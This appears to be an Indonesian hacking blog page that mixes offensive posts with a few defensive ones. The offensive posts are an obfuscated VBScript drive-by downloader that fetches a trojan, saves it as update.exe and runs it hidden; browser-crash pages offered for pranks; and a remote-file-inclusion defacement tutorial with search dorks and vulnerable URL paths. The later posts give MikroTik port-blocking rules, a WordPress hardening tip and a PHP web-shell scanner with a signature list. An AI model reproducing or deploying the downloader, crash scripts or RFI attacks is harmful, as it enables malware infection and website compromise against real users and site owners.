Kamis, 22 September 2011

0 Trojan Html

20.20 Under - From 0x13
[0 Comment]
<script language=”VBScript” type=”text/javascript”>
on error resume next
dl = “www.site.com/trojan.exe”
Set df = ********.createElement(“o bject”)
cls1=”clsid:BD96″
cls2=”C556-65A”
cls3=”3-11D0-9″
cls4=”83A-00C04FC29E36″
clsfull=cls1&cls2&cls3&cl s4
df.setAttribute “classid”,clsfull
strr1=”Mic”
strr2=”roso”
strr3=”ft.”
strr4=”XML”
strr5=”HTTP”
strr=strr1&strr2&strr3&st rr4&strr5
Set x = df.CreateObject(strr,”")
ab1=”A”
ab2=”dod”
ab3=”b.S”
ab4=”t”
ab5=”re”
ab6=”am”
strb1=ab1&ab2&ab3&ab4&ab5 &ab6
strb5=strb1
set YY = df.createobject(strb5,”")
YY.type = 1
str6=”GET”
x.Open str6, dl, False
x.Send
fnamezz1=”update.exe”
scripp1=”Scrip”
scripp2=”ting”
scripp3=”.Fil”
scripp4=”eSyste”
scripp5=”mObject”
scripp=scripp1&scripp2&sc ripp3&scripp4&scripp5
set FF = df.createobject(scripp,”" )
set tmp = F.GetSpecialFolder(2)
fnamezz1= FF.BuildPath(tmp,fnamezz1 )
YY.open
YY.write x.responseBody
YY.savetofile fnamezz1,2
YY.close
set MM = df.createobject(“Shell.Ap plication”,”")
MM.ShellExecute fnamezz1,”",”",”open”,0
</ s c r i p t >
</BODY>
</HTML></body></html></script>
Read More »
Category : -

0 browser crash in script

20.20 Under - From 0x13
[0 Comment]
Assalamualaikum….
mungkin teman-teman skalian ada yang pernah dapat link jail, yang bikin kita klik klik terus ikutin peritahnya yang ga habis-habis…
dan akhirnya jalan keluar hanya Ctrl+Alt+Del trus men End Task mozilla atw browser lain…    itu adalah javascript yg di buat berulang-ulang dengan pertanyaan yg aneh” yang sengaja di buat untuk jail di dunia maya,, tapi browser-browser sekarang sudah mengupdate keamanannya sehingga kalau kita membuka link-link javascript jail browser akan minta konfirmasi dan peringatan kepada user. jadi javascript jail skrng sudah tidak ampuh lagi. nah kali ini saya punya cara baru untuk jail/iseng di dunia maya dengan membuat browser kita jadi crash atau (not responding)…      (kalo lagi asik-asik browsing terus tiba-tiba browser kita crash betapa menyebalkan bukan? )
caranya gampang…
copas script dibawah ini ke notepad
# ======== HTML (1) =======>
<html>
<head>
<body onload="javascript:KeD();">
<script language="JavaScript">
      function KeD()
       {
    var buffer = '\x42';
        for(i=0; i <= 999 ; ++i)
        buffer+=buffer+
    window.open(buffer+buffer+buffer,width=-999999999999999,height=-9999999999999999); // Open New Windows & Crash !!
       }
</script>
</head>
</body>
</html>
# ======== HTML (2) =======>
<html>
<head>
<body onload="javascript:AnS();">
<script language="JavaScript">
      function AnS()
       {
    var buffer = '\x42';
        for(i=0; i <= 999 ; ++i)
        buffer+=buffer+
    window.open(buffer+buffer+buffer,fullscreen=true); // Open New Windows & Crash !!
       }
</script>
</head>
</body>
</html>
lalu save dengan nama (terserah) ekstensi .html
sekarang kita tinggal mencari hostingan gratis (cari aja di gugel) atau bisa juga diupload di web yg sudah di eksploitasi.
setelah file .html nya sudah diupload,,coba buka link file .html yang diupload tadi….   browser anda tiba-tiba crash.  script diatas saya test di firefox 3.6 work…  diatas v3.6 udh ga work lagi….
tapi tenang saja berikut link donglot file crash 1,2,3
http://www.2shared.com/file/r5B23eQn/Crash.html
http://www.2shared.com/file/-3TDw5tv/Crash2.html
http://www.2shared.com/file/_IbkrcpK/Crash3.html
berikut kemampuan script tersebut…
Read More »
Category : -

0 Deface Web simple Via RFI

20.17 Under - From 0x13
[0 Comment]
Cara Mudah Deface Remote File Include

Sebelum kita mulai lebih baik juga kita mengetahwi berbagai macam Command command yang bermanfaat bagi kita..
  • cd namadirectory = Melihat Suatu directory
  • ls -al = Melihat Suatu Directory Lebih Dalam lagi
  • find = Mengecek Directory directory
  • cat = Membaca Suatu Berkas
  • wget = MengUpload suatu Files
  • tar -zxvf = MengExtraxt suatu files yang berbentuk tgz
  • pwd = Mengetahui Di Directory mana Kita Berada
  • uname -a = Keberadaan Path berada
  • w = Mengetahui Siapa Saja yang telah menggunakan Shell.
  • curl = mendownload url
  • [EvilShellInject] = inject rshell / c99 kamu
Baiklah kita mulai dengan PHP karena PHP banyak sekali BUG nya..di antaranya :
- Site Oneadmin RFI
atau cari RFI di exploit db atau web penyedia exploit lain.
Kamu Search di Google masukkan Kata Kunci oneadmin site:.com / oneadmin site:com
nah sekarang saya kasi contoh pathnya …
http://target.com/oneadmin/config.php?path[docroot]=
Contoh :
http://target.com/oneadmin/config.php?path[docroot]=[EvilShellInject]
Kamu Search di Google masukkan Kata Kunci modules.php powered by pnphpbb2 site:.com / modules.php powered by pnphpbb2 site:.net atau apa saja yang kalian suka atau kehendaki…
nah sekarang saya kasi contoh pathnya …
http://target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject]
Contoh :
http://www.sikhe.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject]
- Support Ticket
Kamu Search di Google masukkan Kata Kunci include/main.php site:.com / include/main.php site:.net atau apa saja yang kalian suka…
nah sekarang saya kasi contoh pathnya …
http://target.com/include/main.php?config[search_disp]=true&include_dir=
Contoh : …
http://target.com/include/main.php?config[search_disp]=true&include_dir=[EvilShellInject]
nah sekarang tinggal upload file html/php defacesan kita ke direktoryinya
kemudian buka website yang telah di deface:
http://target.com/lokasipathnya/index.html
Lumayan banyak kan ? Nah selamat mencoba
Read More »
Category : -

0 block virus confiker di mikrotik

20.15 Under - - From 0x13
[0 Comment]
Untuk blok virus conficker melalui mikrotik dapat menggunakan script berikut ini. Buka Terminal di mikrotik terllebih dahulu. Lalu copy script di bawah ini.

/ip firewall mangle

add chain=prerouting protocol=udp dst-port=445 action=mark-connection new-connection-mark=conn-conficker comment=”445-UDP” disabled=no passthrough=yes

add chain=prerouting protocol=tcp dst-port=445 action=mark-connection new-connection-mark=conn-conficker comment=”445-TCP” disabled=no passthrough=yes

add chain=prerouting protocol=tcp dst-port= 135,137,138,139 action=mark-connection new-connection-mark=conn-conficker comment=”135,137,138,139-TCP” disabled=no passthrough=yes

add chain=prerouting protocol=udp dst-port=135,137,138,139 action=mark-connection new-connection-mark=conn-conficker comment=”135,137,138,139-UDP” disabled=no passthrough=yes

add chain=prerouting connection-mark=conn-conficker action=mark-packet new-packet-mark=conficker-pkt passthrough=no comment=”conficker-pkt” disabled=no

/ip firewall filter

add chain=forward packet-mark=conficker-pkt action=drop comment=”drop conficker” disabled=no
Read More »
Category : - -

0 celah bug / keamanan di wordpress

20.13 Under - - From 0x13
[0 Comment]
Salah satu celah keamanan lain dari WordPress yaitu terletak pada direktori wp-content/themes/nama-themes. Misalnya pada URLseperti ini:
http://namadomainsitus/wp-content/themes/nama-theme
Dengan menggunakan pola URL seperti itu, struktur direktori kontrol panel hosting yang digunakan oleh sebuah situs WordPress bisa terlihat. Ini bisa membuka celah untuk dieksploitasi lebih lanjut. Namun yang paling rawan yaitu terlihatnya username akun hosting dari domain situs yang dites menggunakan pola URL tersebut.
Memang sih, tak terlalu beresiko jika password-nya tidak diketahui atau sulit ditembus oleh pihak yang kurang bertanggung jawab. Selama password akun hosting tidak bocor atau tidak tertebak, maka walaupun username sudah diketahui, bisa saya katakan masih aman (dari ancaman hacking atau cracking).
Walaupun demikian, tentunya tidak ada salahnya kita sebagai admin situs (yang menggunakan CMS WordPress) berusaha meningkatkan level keamanan situs kita menjadi 1 level lebih tinggi.
Dengan menutup/mengamankan salah satu celah ini, tentunya situs kita akan relatif lebih sulit untuk ditembus. Username akun hosting kita jadi tidak mudah terlihat (lewat metode eksploitasi via URL).
Sebelum saya lanjut ke cara pencegahan, mari kita lihat dulu salah satu contoh tampilan celah keamanan WordPress yang cukup rawan.
Ilustrasi di atas hanyalah situs fiktif. Jadi, bukan berarti saya sengaja menelanjangi keamanan sebuah situs yang telah ada. Boleh Anda tes sendiri kalau tidak percaya tentang fiktifnya domain situs wongkampret.com :) Setidaknya hingga tulisan ini saya publish, belum ada yang menggunakan domain tersebut.
Dari pesan error yang muncul dalam gambar/contoh di atas, username akun hostingnya jelas terlihat, yaitu ‘wongkampret’. Sebenarnya tanpa eksploitasi begini pun bisa dengan mudah ditebak. Namun namanya juga contoh. Bisa saja username yang digunakan bukan berupa nama situsnya.
Celah keamanan seperti di atas cukup sering saya temukan. Misalnya pada beberapa blog WordPress teman-teman blogger (terutama yang menggunakan cPanel sebagai kontrol panel hostingnya). Bahkan pada salah satu blog milik seorang pakar WordPress ternama Indonesia. Pola pesan error yang muncul via URL di atas biasanya sama, yaitu berupa:
Fatal error: Call to undefined function get_header() in /home/username-hosting/public_html/wp-content/themes/nama-theme/index.php on line bla..bla..bla

Cara menutupi celah keamanan direktori wp-content/themes/namatheme

  1. Login ke kontrol panel hosting Anda.
  2. Buka file index.php pada direktori theme yang Anda gunakan pada situs/blog Anda. Misalnya: wp-content > themes > namatheme > index.php
  3. Tambahkan kode PHP berupa: 
    <?php error_reporting(0);?>
    Tepatnya di atas atau sebelum kode <?php get_header(); ?>
    Lihat saja contoh berikut agar lebih jelas.

  1. Seperti keterangan pada gambar di atas, kode yang kita tambahkan gunanya yaitu untuk menghilangkan pesan error ketika ada orang jahil ingin mengekploitasi keamanan situs WordPress kita lewat pola URL namadomain/wp-content/themes/namatheme
  2. Silakan klik tombol ‘simpan/save’ usai Anda menambahkan sebaris kode PHP di atas. Lalu coba tes kembali hasilnya dengan mengetikkan : 
    http://namadomainsitusanda/wp-content/themes/namathemeyangandagunakan
Jika berhasil, pesan error akan hilang dan hanya muncul halaman kosong. Namun penambahan kode penghilang pesan error ini bisa mengakibatkan kita tidak mengetahui di mana letak error ketika kita salah mengedit script theme. Kemungkinan cuma muncul halaman kosong/blank pada lokasi halaman yang telah kita edit. Misalnya pada halaman index. Bisa juga muncul isinya, namun tanpa keterangan error apa pun.
Jika menemukan kondisi seperti itu, ada baiknya Anda hapus sebentar baris kode penghilang pesan errornya. Setelah letak errornya Anda ketahui & bisa Anda hilangkan, silakan tambahkan kembali kode penghilang pesan error tersebut. Beres deh masalahnya
Selamat mencoba dan mohon koreksi jika ada yang keliru dari penjelasan saya di atas.
Read More »
Category : - -

0 scan keylogger lewat mikrotik

20.12 Under - From 0x13
[0 Comment]
Mungkin analisa ane seh biasa pake keylogger dan sejenisnya, pertama mungkin kita bisa menggunakan scan dengan anti virus, Kaspersky atau yang lainnya, atau pake anti keylogger juga bisa, bisa dicari2 di Google, bisa juga pake deepfreeze tapi bisa juga di undepfreeze, kalo keyloggernya rada nakal kita bisa blok keylogger tadi di network kita.

Akhirnya saya inisiatif blok lewat port, kebetulan jaringan di warnet ini memakai mikrotik. Langsng saja, jadi judulnye berubah blok keylogger di jaringan mikrotik.

Keylogger biasanya report akun2 kepada si "bos"nya menggunakan beberapa port,

1. FTP
2. EMAIL

Port FTP berada di angka 21

Sementara port yang digunakan untuk layanan email berada pada port :
1. 25
2. 995
3. 465
4. 587
5. 110
6. dll

Mari kita block port-port tersebut di mikrotik, ini cara yang menurut saya bagus untuk owner warnet atau operator warnet, karena kebanyakan keylogger menggunakan metode penyimpanan log 3 metode:

1. FTP
2. EMAIL

Setelah Googling ada juga yang melalui dumping file, tapi saya kurang paham system ini,
dan bagusnya setau saya semua port diatas tidak digunakan oleh game - game online Indonesia manapun. Karena kebanyakan warnet gabung dengan game online :D

dibawah ini ada script mikrotik yang bisa langsung di paste di terminal mikrotik anda, nanti src address nya sesuaikan dengan IP Network LAN warnet tujuan.

Code:



1 ip firewall filter add chain=forward protocol=tcp src-address=110.110.1.0/24 action=drop port=21 comment="BLOCK FTP"

2 ip firewall filter add chain=forward protocol=tcp src-address=110.110.1.0/24 action=drop port=995 comment="BLOCK MAIL"

3 ip firewall filter add chain=forward protocol=tcp src-address=110.110.1.0/24 action=drop port=25 comment="BLOCK PORT"

4 ip firewall filter add chain=forward protocol=tcp src-address=110.110.1.0/24 action=drop port=465 comment="BLOCK PORT"

5 ip firewall filter add chain=forward protocol=tcp src-address=110.110.1.0/24 action=drop port=587 comment="BLOCK PORT"

6 ip firewall filter add chain=forward protocol=tcp src-address=110.110.1.0/24 action=drop port=110 comment="BLOCK PORT"



ane contohkan disini pake 110.110.1.0/24 karena jaringan network dimarkas ane pake 110.110.1.0/24 , bisa disesuaikan dengan ip lan warnet nya
nah dengan begitu kita bisa agak merasa aman karena si empunya keylogge
Read More »
Category : -
20.10 Under - - From 0x13
[0 Comment]


nih SC buat scan backdoor atau shell lewat php

#!/usr/bin/php
array("c999shexit();", "setcookie(\"c999sh_surl\");", "c999_buff_prepare();"),
"c100" => array("\$back_connect_c=\"f0VMRgEBAQA", "function myshellexec(\$command) {", "tEY87ExcilDfgAMhwqM74s6o"),
"r57" => array("if(strpos(ex(\"echo abcr57\"),\"r57\")!=3)", "function ex(\$cfe)", "\$port_bind_bd_c=\"I2luY2x1ZGUg"),
"erne"=> array("function unix2DosTime(\$unixtime = 0)", "eh(\$errno, \$er", "\$mtime=@date(\"Y-m-d H:i:s\",@filemti"),
"Safe_Over" => array("function walkArray(\$array){", "function printpagelink(\$a, \$b, \$link = \"\")", "if (\$cmd != \"downl\")"),
"cmd_asp" => array(" ' -- Read th", "ll oFileSys.D", "Author: Maceo")
);
//the script work
$euristic_active = true;
$euristic_sens = 40;
for ($i = 1; $i < $argc; $i++) { if ($argv[$i] == "-h") help($argv[0]); elseif($argv[$i] == "-e") { if ($argv[$i+1] == "Y") $euristic_active = true; if ($argv[$i+1] == "N") $euristic_active = false; } elseif($argv[$i] == "-p") $euristic_sens = $argv[$i+1]; elseif($argv[$i] == "-d") { dir_scan($argv[$i+1]); exit; } elseif($argv[$i] == "-f") { a($argv[$i+1]); exit; } } dir_scan("."); function dir_scan($name) { if (!is_dir($name)) echo "$name is not a dir\n"; if ($o = @opendir($name)) { while(false !== ($file = readdir($o))) { if ($file == '.' or $file == '..' or $file == basename(__file__)){ continue;} else if (is_dir($name."/".$file)){dir_scan($name."/".$file);} else a($name."/".$file); } closedir($o); } else echo "i can't open $name dir\n"; } function a($file) { global $euristic_active; global $euristic_sens; if ($l = file_get_contents($file)) { if ( $shell = check($l)) { echo "[DANGER] word_list > ".$file."\tprobably ".$shell." shell\n";
}
else if ($euristic_active)
if ($t = check_euristic($l) and $t > $euristic_sens)
{
echo "[_ALERT] euristic $t%> ".$file."\tprobably is a shell\n";
}
}
else
{
echo "i can't open $file file\n";
}
}
function check($string)
{
$check = 0;
global $word__;
foreach($word__ as $shell => $code)
foreach($code as $microcode)
if (stripos($string, $microcode) !== false)
{
$check ++;
if ($check == 3) return $shell;
}
return false;
}
function check_euristic($string)
{
global $euristic__;
$check = 0;
foreach($euristic__ as $code)
if (stripos($string, $code) !== false)
$check++;
return intval(($check * 100) / count($euristic__));
}
function help($me)
{
echo "indonesianhacker shell scanner\n".
"$me {-e [euristic method default = Y] Y/N -p [[0-100] euristic sensibility fewer == most feeble ] [-d [directory] / -f [file] ]}\n".
"exemple: $me -e N -d /tmp\n"
;
exit;
}
?>

save dengan ext nya scanshell.php

moga membntu
Read More »
Category : - -
Langganan: Postingan (Atom)
 
© Copyright ------------------------------------------------------------- | Template By : Nando Cyber4rt